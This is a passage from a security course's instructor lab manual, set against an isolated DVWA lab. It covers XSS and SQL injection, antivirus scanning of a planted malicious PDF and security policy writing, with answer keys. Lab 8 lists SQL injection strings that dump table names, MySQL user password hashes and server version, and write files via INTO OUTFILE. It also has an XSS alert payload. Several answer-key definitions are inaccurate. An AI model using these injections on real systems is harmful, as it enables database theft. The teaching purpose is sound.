IP address by typing: $ sudo ifconfig a 5. If it has an IP host address, then connect to it using your Instructor VM workstations Internet Explorer browser: http://targetubuntu01 IP host /dvwa 6. If it does not have an IP address, first verify which eth is being detected by the VM? i.e. eth0, eth1, eth2, etc? This information is provided in the ifconfig commands output. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -98- IT255 Instructor Lab Manual LABORATORY 7. To set a static IP or to set a non-standard eth interface to DHCP on Ubuntu follow these steps: a. $ sudo nano /etc/network/interfaces b. Once the nano editor comes up enter the following entry for your particular eth interface (insert the eth# that is displayed as enabled on your VM it may not be eth0, eth1, eth2, etc.): i. auto lo eth0 iface lo inet loopback iface eth0 inet static address 172.30.0.xxx(xxx= your static ip host address) netmask 255.255.255.0 (enter the /24 netmask) gateway 172.30.0.1 (enter the IP default gateway ip here) c. For DHCP enter the following: i. auto lo eth0 iface lo inet loopback iface eth0 inet dynamic d. Save and exit by hitting CTRL+X on the keyboard and Y to save the file. e. Type the following to restart: $ sudo /etc/init.d/networking restart To Exploit a Cross-site Scripting (XSS) Vulnerability in DVWA perform the following: 1. Exploit a cross site scripting vulnerability to cause a message to appear on a users screen. 2. Provide a screen shot or description of the attack 3. With TargetUbuntu01 enabled, you need to open your Internet Explorer browser to connect to the web site: http://172.30.0.x/dvwa, where x is the IP host address allocated by the DHCP server o o o URL: http:///dvwa Username: admin Password: password 4. Once the web page comes up, login and click on the DVWA Security tab and set it to low. 5. Click on the XSS Reflective tab which will display our vulnerable web application test Reflective Cross Site Scripting against the web site. 6. Try to insert in the provided input box the following: Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -99- IT255 Instructor Lab Manual LABORATORY See the output there. This indeed shows that we can further send scripts through the validation box provided. 7. Reflective XSS is the application when enabled can create alerts and pop-ups. To further test the XSS vulnerability please insert the following: alert(vuln); Hello! To Exploit an SQL Injection Vulnerability in DVWA perform the following: 1. Exploit an SQL injection vulnerability by injecting SQL commands into the applications data entry fields and provide a screen shot or output of the attack 2. Power up the TargetUbuntu01 Linux VM server and using your Instructor workstations Internet Explorer, open a web browser as follows: http://172.30.0.x/dvwa, where x is IP host address that was DHCPed to the TargetUbuntu01 Linux VM server 3. Once the web page comes up, login and click on the DVWA Security tab and set it to low. Then click on the SQL Injection tab which will provide us our vulnerable web app to test SQL injections against the back-end database. 4. We will try OMalley as we want to see if the field populates any anomalies or errors. Did any character get recognized before our error? 5. We see from here that we can interrupt and possibly debug information from a different SQL injection. Lets try actually passing an SQL statement, try a OR x=x;# 6. Familiar statement to the infamous a OR 1&1 # 7. Several other combinations should also work, so lets try some. NOTE: These strings are in clear text, you should check your Web Server logs specifically on Declare statements to know whether or not databases are being injected, and from these logs, check the databases for injected content. Obfuscation by using Hexadecimal character strings is also commonly used. 8. DB Enumeration a ORDER BY 1;# not too different should show the login screen showing that it recognized the command, try 2 then 3 notice the difference between all 3 is 3 is not recognized as a value and the error relates to columns. Now we know we can start using Union Statements. 9. Try a OR firstname IS NULL;# see error? Now try a OR first_name IS NULL;# see the difference? The screen came back just like with our ORDER BY statement earlier. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -100- IT255 Instructor Lab Manual LABORATORY 10. Try a' OR database() LIKE 'DB';# This command searches for a possible hit on the DBs characters. Adding a % splits different fields to query. Try a OR database() LIKE d%;# notice the output? 11. Try a' UNION SELECT table_schema, table_name FROM information_Schema.tables;# results in all Table and Column names as being used. 12. Try a' UNION ALL SELECT 1, @@version;# and that will give you some information on the version info for the SQL server. 13. Try a' UNION ALL SELECT system_user(),user();# this will tell you the user you are making queries under from the web app. 14. Try a' UNION ALL SELECT user, password FROM mysql.user;# priv;#' At this point you have a hash for a user to the backend DB. 15. We will check for injection at this time by issuing 'UNION SELECT 'test', '123' INTO OUTFILE 'testing1.txt. At this point we know we have a user, and we know the DB can be written to. We have users, user IDs, table and column information and an inject able database. Deliverables Upon completion of Lab #8: Perform a Website & Database Attack by Exploiting Identified Vulnerabilities, students are required to provide the following deliverables: 1. Lab #8 Written Analysis of the Identified Vulnerabilities, Exploit, and Remediation Steps: a. A summary of findings, assessment, and recommendations report that includes: i. Enumeration Identification of the Exploit ii. Compromise & Exploit 1. Screenshot or description of the cross site scripting attack 2. Screenshot or description of the SQL injection attack iii. Remediation 2. Lab #8 Assessment Worksheet Questions & Answers Evaluation Criteria and Rubrics The following are the evaluation criteria and rubrics for Lab #8 that the students must perform: 1. Identify web application and web server backend database vulnerabilities as viable attack vectors [20%] 2. Develop an attack plan to compromise and exploit a web site using cross-site scripting (XSS) against sample vulnerable web applications [20%] Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -101- IT255 Instructor Lab Manual LABORATORY 3. Conduct a manual Cross-site Scripting (XSS) attack against sample vulnerable web applications - [20%] 4. Perform SQL injection attacks against sample vulnerable web applications with e-commerce data entry fields [20%] 5. Mitigate known web application and web server vulnerabilities with security countermeasures to eliminate risk from compromise and exploitation [20%] Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -102- IT255 Instructor Lab Manual LABORATORY Lab #8 Assignment Worksheet Perform a Website & Database Attack by Exploiting Identified Vulnerabilities Course Name & Number: ______________________________________________________________ Student Name: _______________________________________________________________________ Instructor Name: _____________________________________________________________________ Lab Due Date: _______________________________________________________________________ Overview Students must provide a Written Report of the Identified Vulnerabilities, Exploits, and Remediation Steps organized as follows: A summary of findings, assessment, and recommendations report that includes: a. Enumeration Identify the Exploit what did you find? b. Compromise & Exploit what were you able to do? i. Screenshot or description of the cross-site scripting attack what did you compromise? ii. Screenshot or description of the SQL injection attack what data did you extract? c. Remediation what security countermeasures do you recommend to mitigate the risk from compromise and exploitation? Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -103- IT255 Instructor Lab Manual LABORATORY Lab #8 Assessment Worksheet Perform a Website & Database Attack by Exploiting Identified Vulnerabilities Course Name & Number: ______________________________________________________________ Student Name: _______________________________________________________________________ Instructor Name: _____________________________________________________________________ Lab Due Date: _______________________________________________________________________ Overview The students will verify and perform a Cross-site Scripting (XSS) exploit and an SQL Injection attack on the test bed web application and web server using the Damn Vulnerable Web App (DVWA) loaded on an Apache Web Server on TargetUbuntu01 Linux VM server. They will first identify the IP target host, identify known vulnerabilities and exploits, and then attack the web application and web server using XSS and an SQL Injection to exploit the web application using a web browser and some simple command strings. Lab Assessment Questions & Answers 1. Why is it critical to perform a penetration test on a web application prior to production implementation? Testing and performing penetration tests on web applications and web servers is a critical step in ensuring the confidentiality, integrity, and availability of the web application and service. If ecommerce or privacy data is entered into the web application, the company is under compliance laws and standards to ensure the confidentiality of customer privacy data. Penetration testing should be performed whenever the web application and service is updated or modified. 2. What is a cross-site scripting attack? Explain in your own words. The malicious insertion of scripting code to extract or modify a website, its application, and contents 3. What is a reflective cross-site scripting attack? A reflective cross-site scripting attack is one in which all input shows output on the users/attackers screen, like remote control software. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -104- IT255 Instructor Lab Manual 4. LABORATORY What common method of obfuscation is used in most real world SQL attacks? Because SQL databases dont know the difference between a valid and secure database query and a malicious one, you can obfuscate an SQL database with a real, SQL query command using hexadecimal encoding. 5. Which web application attack is more prone to extracting privacy data elements out of a database? SQL Injection Attack. By inserting real SQL query commands, you may be able to extract privacy data elements from a web application front-end. 6. If you can monitor when SQL injections are performed on an SQL database, what would you recommend as a security countermeasure to monitor your production SQL databases? Monitor your SQL databases for unauthorized or abnormal SQL injections and write scripts for alarming and SNMP network management alerts. Additional safeguards can include encrypting the data elements that reside in long-term storage of the SQL database. 7. Given that Apache and Internet Information Services (IIS) are the two most popular web application servers for Linux and Microsoft Windows platforms, what would you do to identify known software vulnerabilities and exploits? Visit the CVE listing database and identify all known Apache and ISS software vulnerabilities and exploits. Using this information, you can cross reference if any of your production web applications are Apache or Internet Information Services (IIS). You can now perform a vulnerability assessment using Nessus as a scanning tool. Remediate any production web servers with software patches and security patches for identified critical and major software vulnerabilities. 8. What can you do to ensure that your organization incorporates penetrating testing and web application testing as part of its implementation procedures? Make a policy that dictates no production web application can be implemented without proper penetration testing and security hardening. This is critical if your organization is under a compliance law and your web application required inputting of customer privacy data. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -105- IT255 Instructor Lab Manual LABORATORY 9. What other security countermeasures do you recommend for web sites and web application deployment to ensure the C-I-A of the web application? HTTPS:// SSL-128 Bit Encryption Authentication Two-factor Authentication Hashing VPNs Database Back-Ups Database Encryption Placement of Web Server on DMZ Security Countermeasures to Prevent DoS/DDoS Periodic Software Vulnerability Assessments Periodic Penetration Testing & Remediation Steps 10. Who is responsible and accountable for the C-I-A of production web applications and web servers? Web application developers and software developers are responsible and accountable for secure coding and testing the application. Database developers and administrators are responsible and accountable for ensuring the data integrity and back-ups of the database are performed regularly. Network engineers and information systems security practitioners are responsible and accountable for ensuring the network, DMZ, and Internet connectivity is available and protected from DoS/DDoS and other malicious attacks. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -106- IT255 Instructor Lab Manual LABORATORY Laboratory #9 Lab #9: Perform a Virus Scan and Malware Identification Scan and Eliminate Threats Learning Objectives and Outcomes Upon completing this lab, students will be able to complete the following tasks: Identify the risks associated with viruses, malware, and malicious software on a Windows Server Apply security countermeasures to mitigate the risk caused by viruses, malware, and malicious software Enable AVG as an anti-virus, malware, and malicious software security countermeasure on a Windows Server Disable unnecessary services in a Windows workstation and manually baseline enable processes Configure a Windows workstation internal firewall to block future malware infections from penetrating the system Required Setup and Tools This lab does not require the use of the ISS Mock IT Infrastructure - Cisco core backbone network. In addition, the Instructor VM workstation and Student VM workstations should be physically disconnected from the ITT internal network and be isolated on a dedicated layer 2 switch. This will allow for a shared DHCP server to be used to allocate the IP addresses for the instructor and student workstations. The following is required for this hands-on lab: A) A classroom workstation (with at least 4 Gig RAM) capable of supporting an insert-able hard drive or USB hard drive with a pre-configured, virtualized server farm. This classroom workstation/server will support the virtualized server farm connected to the classroom layer 2 switch B) An instructor workstation (with at least 2 Gig RAM) that shall act as the Instructors demo LAB workstation. The instructor will display the Instructor workstation on the LCD projector to demo the loading and configuring of the ITT Mock IT Infrastructure and Server Farm with VMware Player C) Students LAB workstations will use a local copy of the ITT Mock IT Infrastructure Server Farm on a local or USB hard drive with VMware Player to run their Student and Target VMs The following summarizes the setup, configuration, and equipment needed to perform Lab #9: 1. A Virtualized Server Farm with: Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -107- IT255 Instructor Lab Manual LABORATORY a. Microsoft DHCP server for allocating student IP host addresses b. A Student and/or Instructor VM workstation with Internet Explorer 2. Target VMs as described by the Lab: a. Windows 2003 Server Target VM 01 b. AVG Antivirus and IZarc Archiver Windows 2003 Server Standard Edition Windows Server 2003 Standard Edition 32-bit (VM Name: TargetWindows01) o Computer Name: Windows02 o Three Users Available: administrator, instructor or student (case sensitive) o Password: ISS316Security o IP Address: DHCP o Domain Login: NO FTP (Filezilla FTP Server) o Port: 21 o Username: instructor or student o Password: TFTP (Tftpd32 TFTP Server) o Port: 69 o Username: o Password: 3. Standard ITT ISS onsite student workstation must have the following software applications loaded to perform this lab: a. VMware Player 3.x b. Microsoft Office 2007 or higher for Lab Assessment Questions & Answers Recommended Procedures Instructor Demo Lab#9: The instructor will discuss the risks and threats caused by viruses, Trojans, worms, malware, and malicious software. Then he/she will demonstrate using AVG Anti-virus protection for Windows to identify Malware found on a compromised system. The instructor will also demonstrate how to disable unnecessary services in Windows (i.e., applications & processes, etc.) and configure the Windows Server internal firewall for enhanced security and protection against threats from Malware. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -108- IT255 Instructor Lab Manual LABORATORY Hands-on Lab #9 Instructor Steps: The Instructor will perform the following demonstration using VMware Player: 1. Connect the instructor-removable hard drive to the dedicated Instructor workstation 2. Power-up and log into your Instructor VM and TargetWindows01 VM. Obtain an IP address from the DHCP Server on the classroom layer 2 switch Note: Remember if you only have 2 Gig RAM, you can power-on two VMs simultaneously to run this hands-on lab. Instructor VM and the TargetWindows01 VM server. 3. Connect the LCD projector to the Instructor workstation and project onto the screen for the students to view your demonstration 4. Power up and login into the Instructor VM and TargetWindows01 VM a. Login ID: instructor or student (case sensitive) b. Password: ISS316Security (case sensitive) 5. On the TargetWindows01 VM, make sure the prodrev.zip file is on the desktop. This is an encrypted zip file with a password 6. Click on AVG Free 9 icon on your desktop and perform an update by clicking on update now, no internet access will be available but before scanning any file this should be the first step 7. Next click on Computer Scanner and, for now, pick the Scan Specific files or folders option and select the desktop to be scanned. Then click Start Scan option 8. This scan will return no infected files, given that encrypted files cannot be opened for scanning by Anti-virus software 9. Open the prodrev.zip file now using IZarc archiver by right clicking the file and clicking the extract here option. (See Screen 3) 10. Enter the files decryption password (password123) and you should now see a PDF file on the desktop named productreview.pdf. 11. Repeat Step 4 in AVG and it should pick up a malicious virus found exploit by looking at the scan results for the most recent scan 12. Disable un-needed services in your Student VM workstation: a. Right click My Computer and click Manage b. Click on Services from the left side tree menu c. Select the desired service, open the context menu and select Properties d. Change Startup Type to Manual or Disable then choose OK Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -109- IT255 Instructor Lab Manual LABORATORY Figure 14 Disable Windows Service 13. Document all services that are disabled. 14. Launch Windows Firewall: Start -> Administrative Tools -> Windows Firewall 15. Clicked Advanced 16. Identify the default ICMP settings for the internal Windows Server firewall in your Student VM workstation Hands-on Lab #9 Student Steps: Students should perform the following steps: 1. Connect the student removable hard drive to your workstation 2. Power-up and log into your Student VM and TargetWindows01 VM. Obtain an IP address from the DHCP Server on the classroom layer 2 switch Note: Remember if you only have 2 Gig RAM, you can power-on two VMs simultaneously to run this hands-on lab. Student VM and the TargetWindows01 VM server. 3. Power up and login into the Instructor VM and TargetWindows01 VM a. Login ID: student (case sensitive) b. Password: ISS316Security (case sensitive) 4. On the TargetWindows01 VM, make sure the prodrev.zip file is on the desktop. This is an encrypted zip file with a password Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -110- IT255 Instructor Lab Manual LABORATORY 5. Click on AVG Free 9 icon on your desktop, and perform an update by clicking on update now, no internet access will be available but before scanning any file this should be the first step 6. Next click on Computer Scanner and for now pick the Scan Specific files or folders option and select the desktop to be scanned. Then click Start Scan option 7. This scan will return no infected files, given that encrypted files cannot be opened for scanning by Anti-virus software 8. Open the prodrev.zip file now using IZarc archiver by right clicking the file and clicking the extract here option. (See Screen 3) 9. Enter the files decryption password (password123), and you should now see a PDF file on the desktop named productreview.pdf. 10. Repeat Step 4 in AVG, and it should pick up a malicious virus found exploit by looking at the scan results for the most recent scan 11. Disable un-needed services in your Student VM workstation: a. Right click My Computer and click Manage b. Click on Services from the left side tree menu c. Select the desired service, open the context menu and select Properties d. Change Startup Type to Manual or Disable then choose OK Figure 14 Disable Windows Service 12. Document all services that are disabled. 13. Launch Windows Firewall: Start -> Administrative Tools -> Windows Firewall 14. Clicked Advanced Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -111- IT255 Instructor Lab Manual LABORATORY 15. Identify the default ICMP settings for the internal Windows Server firewall in your Student VM workstation Deliverables Upon completion of this lab, students are required to provide the following deliverables: 1. Lab #9 Students should provide a document, in Microsoft Word format, containing the following information: A description of any identified un-needed services running on the Student VM workstation along with a description of the suggested action that should be taken to secure each service. A description of at least three ICMP firewall rules that can be changed on the Student VM workstation to enhance C-I-A A screenshot of their PDF submission to Virus Total of the malicious PDF 2. Lab #9 Lab Assessment Questions & Answers Evaluation Criteria and Rubrics The following are the evaluation criteria and rubrics for Lab #9 that the students must perform: 1. Was the student able to identify the risks associated with viruses, malware, and malicious software on a Windows Server? [20%] 2. Was the student able to apply security countermeasures to mitigate the risk caused by viruses, malware, and malicious software? [20%] 3. Was the student able to enable AVG as an anti-virus, malware, and malicious software security countermeasure on a Windows Server? [20%] 4. Was the student able to disable unnecessary services in a Windows workstation and manually baseline enable processes? [20%] 5. Was the student able to configure a Windows workstation internal firewall to block future malware infections from penetrating the system? [20%] Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -112- IT255 Instructor Lab Manual LABORATORY Lab #9 Assessment Worksheet Perform a Virus Scan and Malware Identification Scan and Eliminate Threats Course Name & Number: ______________________________________________________________ Student Name: _______________________________________________________________________ Instructor Name: _____________________________________________________________________ LAB Due Date: _______________________________________________________________________ Overview In this lab the students learn how to use AVG Anti-virus for Windows to identify malware found on a compromised system. They will also examine the services enabled in their Windows workstation and disable unnecessary applications and processes. Finally, the students will examine the default configurations of a Windows workstation internal firewall. LAB Assessment Questions & Answers 1. What is the main difference between a Trojan and a Virus? A virus calls for an action to be taken by the user to accept its malicious use. A Trojan takes advantage of an explicit application or OS defaults to propagate and infect further. 2. A virus or malware can impact which of the three tenets of information systems security? C-IA? Describe how it impacts it as well. Availability viruses and malware tend to slow performance and availability to applications and data and can greatly impact a users ability to access applications and data. 3. Once a file is found malicious on your computer, what are the default settings for USB/removable device scanning? What should an organization do regarding use of USB hard drives and slots on existing computers and devices? Default settings for this are usually off and you would need to enable them through Scans>Removable Device Detection or similar in most antivirus applications. Acceptable Use Policies (AUP) should address what can and cannot be inserted into organization-owned IT assets (computers, workstations, laptops, desktops, etc.). Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -113- IT255 Instructor Lab Manual LABORATORY Use of anti-virus and automatic scanning for any media inserted into a computer should be enabled leaving no back-doors or openings for malware or malicious software to be exposed on an organizations computer. 4. Why is it recommended to do an anti-virus signature file update before performing an antivirus scan on your computer? Many new malware and viruses are detected every day, and usually Anti-virus vendors update their antivirus signature files at least several times per week. To ensure you have coverage on the most recent malware and malicious software, it is recommended that you update your anti-virus signature files daily prior to performing a system scan. 5. When sending a file a user asks you to zip it and encrypt the file if possible, why would this be? Encrypted attachments cannot be scanned or opened by the computer Anti-Virus; this means that the attachment will reach the recipient fine unless there is a rule regarding encrypted zip files being automatically blocked. 6. You receive an email regarding a link from one of your friends for some special documents, shortly after that you receive the same email from 3 other friends and the emails are not being blocked, what is likely the cause? This is typical of a phishing attack. Once you click on the link, it will download a piece of malware onto your machine and possiblymutate. 7. Specify a setting you would want to turn on if you were running AVG on your system to improve the quality of scans you do on the system? Use Heuristics, ensure that zip files contents are opened and scanned, automate signature updates, and automate scanning. 8. Your employees e-mail file attachments to each other and externally through the organizations firewall and Internet connection. What security countermeasures can you implement to help mitigate the risk of rogue e-mail attachments and URL web links? Security Awareness Training. Acceptable Use Policy. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -114- IT255 Instructor Lab Manual LABORATORY E-mail Quarantine and Filtering System. E-mail Attachment IDS/IPS and Filtering. Isolate/Quarantine E-mails with Unknown Attachments or Imbedded URL Links. Test and Validate the Integrity of the E-mail Attachment Prior to Releasing From Quarantine. 9. What are typical indicators that your computer system is compromised? a. Degraded performance b. Unusual network services c. Missing system logs d. Anti-virus not running e. Application anomalies 10. What elements are needed in a Workstation Domain policy regarding use of anti-virus and malicious software prevention tools? Which anti-virus and malicious software prevention tools to use on what platform. Standardized configurations and settings based on organization-wide security policy definition. Implemented with a layered security strategy in mind to mitigate the threat from coming or entering into the IT infrastructure (i.e., LAN-to-WAN Domain IDS/IPS, E-mail Filtering/Quarantining, etc.) and then to mitigate the threat at the last mile, the workstation or computer itself. Frequency of anti-virus and malicious software prevention tool updates and automation. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -115- IT255 Instructor Lab Manual LABORATORY Laboratory #10 Lab #10: Craft an Information Systems Security Policy Learning Objectives and Outcomes Upon completing this lab, students will be able to complete the following tasks: Define the policy definition for expected behavior by users, system administrators, management, and security personnel through the use of proper information security policy writing skills Define and authorize the consequences of violations to an information security policy by properly documenting them in said security policy Define the company consensus baseline stance on security regarding a specific issue or process and how it should be handled Minimize risk for the company by properly documenting and proactively addressing potential security needs or scenarios Track compliance with regulations and legislation by providing a framework for best practice that can be followed by all employees Required Setup and Tools This is a paper-based, hands-on LAB and does not require the use of the ISS Mock IT infrastructure or Virtualized Server Farm. The following summarizes the setup, configuration, and equipment needed to perform Lab #10: 1. Standard ITT ISS onsite student workstation must have the following software applications loaded to perform this lab: a. Microsoft Office 2007 or higher for Assessment Worksheet Questions & Answers and reviewing and drafting the Information Security Policy Templates made available by SANS.org: http://www.sans.org/security-resources/policies/ Recommended Procedures Instructor Demo Lab #10: The instructor will lead a classroom discussion on what a policy is and what an IT security policy framework is. Policies, standards, procedures, and guidelines will be defined as well as an overall policy framework for information systems security. Information systems security policies describe the organizations definition for an enterprise-wide policy and how the organizations IT assets and Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -116- IT255 Instructor Lab Manual LABORATORY intellectual property are to be handled and protected. The instructor will show students what an IT security policy road-map looks like and will show examples on the SANS Institute website for discussion. Hands-on Lab #10 Instructor Steps: The Instructor will lead a classroom discussion on the needs and requirements for defining an information systems security policy and policy framework: 1. Discuss the importance of Information Security Policy writing and how Policies differ from Standards and Guidelines. 2. Discuss some of the most commonly use Information Security Policies and, if possible, the instructor is encouraged to show and review whatever existing policies are in place for ITT-Tech. 3. Browse to SANS.org at the following link and open for review the document with a recommended Security Policy Roadmap - Process for Creating Security Policies: http://www.sans.org/reading_room/whitepapers/policyissues/security-policy-roadmapprocesscreating-security-policies_494 4. Focus on the main sections of Section 4 Information Gathering: a. Identify Assets b. Identify Vulnerabilities and Threats c. Evaluation of Measures and Controls 5. Review the main sections in Section 7 Writing Policy: a. Securing Hardware, Peripherals And Other Equipment b. Controlling Access To Information And Systems c. Purchasing And Maintaining Commercial Software d. Developing And Maintaining In-House Software e. Combating Cyber Crime f. Complying With Legal And Policy Requirements g. Planning For Business Continuity h. Addressing Personnel Issues Relating To Security i. Controlling E-Commerce Information Security j. Delivering Training And Staff Awareness k. Dealing With Premises Related Considerations l. Detecting And Responding To IS Incidents m. Classifying Information And Data Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -117- IT255 Instructor Lab Manual LABORATORY 6. Browse to SANS.org at the following link and open for review the document with a recommended Information Security Policy Development Guide for Large and Small Companies: http://www.sans.org/reading_room/whitepapers/policyissues/information-securitypolicydevelopment-guide-large-small-companies_1331 7. Review the main sections in Section 8 Policy Development Lifecycle a. Senior Management Buy-in b. Determine a Compliance Grace Period c. Determine Resource Involvement d. Review Existing Policy e. Determine Research Materials f. Interview SMEs g. Write Initial Draft h. Style Considerations i. Review Cycles j. Review with Additional Stakeholders k. Policy Gap Identification Process l. Develop Communication Strategy m. Publish n. Activate Communication Strategy o. Regularly Review and Update 8. Review the main sections in Section 9 Policy Document Outline a. Introduction b. Purpose c. Scope d. Roles and Responsibilities e. Sanctions and Violations f. Revisions and Updating Schedule g. Contact information h. Definitions/Glossary i. Acronyms 9. Navigate with your browser to the SANS Security Policy Project web page http://www.sans.org/security-resources/policies/, scroll to the bottom of the page and review the available templates for Information Security Policies. Explain to the students that they will need Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -118- IT255 Instructor Lab Manual LABORATORY to pick out a template of their choice and fill out an Information Security Policy based on the fictitious company discussed in Lab #6: Business Continuity Planning. Hands-on Lab #10 Student Steps: Students should perform the following steps: 1. Research the importance of Information Security Policy writing and how Policies differ from Processes and Guidelines. 2. Research some of the most commonly use Information Security Policies and, if possible, review whatever existing policies are in place for ITT-Tech. 3. Browse to SANS.org at the following link and open for review the document with a recommended Security Policy Roadmap - Process for Creating Security Policies: http://www.sans.org/reading_room/whitepapers/policyissues/security-policy-roadmapprocesscreating-security-policies_494 4. Review the main sections of Section 4 Information Gathering: a. Identify Assets b. Identify Vulnerabilities and Threats c. Evaluation of Measures and Controls 5. Review the main sections in Section 7 Writing Policy: a. Securing Hardware, Peripherals And Other Equipment b. Controlling Access To Information And Systems c. Purchasing And Maintaining Commercial Software d. Developing And Maintaining In-House Software e. Combating Cyber Crime f. Complying With Legal And Policy Requirements g. Planning For Business Continuity h. Addressing Personnel Issues Relating To Security i. Controlling E-Commerce Information Security j. Delivering Training And Staff Awareness k. Dealing With Premises Related Considerations l. Detecting And Responding To IS Incidents m. Classifying Information And Data 6. Browse to SANS.org at the following link and open for review the document with a recommended Information Security Policy Development Guide for Large and Small Companies: Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -119- IT255 Instructor Lab Manual LABORATORY http://www.sans.org/reading_room/whitepapers/policyissues/information-securitypolicydevelopment-guide-large-small-companies_1331 7. Review the main sections in Section 8 Policy Development Lifecycle a. Senior Management Buy-in b. Determine a Compliance Grace Period c. Determine Resource Involvement d. Review Existing Policy e. Determine Research Materials f. Interview SMEs g. Write Initial Draft h. Style Considerations i. Review Cycles j. Review with Additional Stakeholders k. Policy Gap Identification Process l. Develop Communication Strategy m. Publish n. Activate Communication Strategy o. Regularly Review and Update 8. Review the main sections in Section 9 Policy Document Outline a. Introduction b. Purpose c. Scope d. Roles and Responsibilities e. Sanctions and Violations f. Revisions and Updating Schedule g. Contact information h. Definitions/Glossary i. Acronyms 9. Navigate with your browser to the SANS Security Policy Project web page http://www.sans.org/security-resources/policies/, scroll to the bottom of the page and review the available templates for Information Security Policies. Pick out an information security policy template and fill it out based on the fictitious company discussed in Lab #6: Business Continuity Planning. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -120- IT255 Instructor Lab Manual LABORATORY Deliverables Students are required to provide the following deliverables as part of the Lab #10: Craft an Information Systems Security Policy: 1. Lab #10 Written Information System Security Policy based on one of the templates provided by the SANS Institute made for the fictitious company introduced in Lab #6 Business Continuity Planning 2. Lab #10 Lab Assessment Questions & Answers Evaluation Criteria and Rubrics The following are the evaluation criteria and rubrics for Lab #10 that the students must perform: 1. Was the student able to define the policy definition for expected behavior by users, system administrators, management, and security personnel through the use of proper information security policy writing skills? [50%] 2. Was the student able to define and authorize the consequences of violations to an information security policy by properly documenting them in said security policy? [10%] 3. Was the student able to define the company consensus baseline stance on security regarding a specific issue or process and how it should be handled? [10%] 4. Was the student able to mitigate risk for the company by properly documenting and proactively addressing potential security needs or scenarios? [20%] 5. Was the student able to track compliance with regulations and legislation by providing a framework for best practice that can be followed by all employees? [10%] Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -121- IT255 Instructor Lab Manual LABORATORY Lab #10 Assessment Worksheet Craft an Information Systems Security Policy Course Name & Number: ______________________________________________________________ Student Name: _______________________________________________________________________ Instructor Name: _____________________________________________________________________ LAB Due Date: _______________________________________________________________________ Overview The students will research the benefits of writing and maintaining Information Security Policies which help to ensure that risk is minimized and that any security incidents are effectively responded to. Information security policy defines the organizations attitude to information, and announces internally and externally that information is an asset, the property of the organization, and it is to be protected from unauthorized access, modification, disclosure, and destruction. The instructor will also guide the students through the Security Policy Roadmap and Development Guides provided by the SANS Institute and determine what type of information security policy they will be writing for their fictitious organization. Lab Assessment Questions & Answers 1. What is a Policy? Give an example of an information systems security policy. A policy is written document that defined specific requirements or rules that must be met. In the information/network security realm, policies are usually point-specific, covering a single area. For example, an "Acceptable Use" policy would cover the rules and regulations for appropriate use of the computing facilities. 2. What is a Standard? Give an example of an information systems security standard. A standard is typically collections of system-specific or procedural-specific requirements that is organization-wide to help ensure C-I-A. For example, you might have a data classification standard that defines how different types of data are to be handled throughout the organization. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -122- IT255 Instructor Lab Manual LABORATORY 3. What is a Guideline? A guideline defines the parameters or boundaries of which a policy and its standard and procedures are to be implemented. These are suggestions for implementation but not necessarily mandatory suggestions. 4. Name 5 different sample policy templates available by SANS Institute. Acceptable Encryption Policy Acceptable Use Policy Anti-Virus Process Application Service Provider Policy Audit Vulnerability Scanning Policy Automatically Forwarded Email Policy Automatically Forwarded Email Policy DMZ Lab Security Policy 5. Give an example of a sanction or violation that can be imposed on an employee that performs a breach of an information security policy. The students should come up with their own sanction and be able to explain why that is an appropriate remedy that will discourage other employees from performing the same violation in the future. 6. Submit your written policy using one of the policy templates you downloaded from the SANS Institute website. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -123-

Find millions of documents on Course Hero - Study Guides, Lecture Notes, Reference Materials, Practice Exams and more. Course Hero has millions of course specific materials providing students with the best way to expand their education.

Below is a small sample set of documents:

Cornell - AEP - 4900
427798913041898E-10-2.038551352478519E-9i -9.715173849038614E-10+2.4457620225804726E-9i -7.794519875989931E-7+2.1911344184327693E-7i-9.884681366112671E-5 1.9999999999999998E-4 0 -3.7121457092308217E-9-4.746947
NYU - MANAGEMENT - MOA
